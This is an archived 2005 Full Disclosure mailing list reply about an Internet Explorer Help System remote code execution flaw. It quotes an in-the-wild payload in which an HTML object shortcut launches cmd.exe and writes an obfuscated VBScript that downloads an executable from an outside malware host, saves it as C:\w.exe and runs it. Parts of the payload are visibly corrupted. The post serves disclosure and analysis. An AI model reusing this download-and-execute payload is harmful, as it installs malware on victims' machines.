Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Internet Explorer Help System RCE
From: Duncan Hill <dhill+fulldisc () cricalix net>
Date: Fri, 13 May 2005 06:25:54 +0100

On Friday 13 May 2005 06:15, Mike Allen wrote:

Modded it slightly to do alert instead of document.write and executed on my 
Linux box.

u Q<    WVruCP      A<object id=a 
<param name=command ______alue=shortcut> 
<param name=item1 __alue=',cmd.exe,/c start /min cmd.exe /c "echo on error 
resume next : set o = CreateObject("msxm"+"l2.X"+"MLH"+"TTP") : o.open 
"G"+"ET","http://iframedollars.biz/dl/loadad____622.exe",False : o.send : set 
s = createobject("adod"+"b.str"+"eam") : s.type=1 : s.open : s.write 
o.responseBody : s.sa____etofile "C:"+"\"+"w.e"+"xe",2 > c:\c.___bs&&wscript 
c:\c.______bs&&del c:\c.___bs&&if exist c:\w.exe start c:\w.exe"'> 

Not sure if the corruption is from editing the script.

Oh, that script at the end is javascript btw, not php.
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]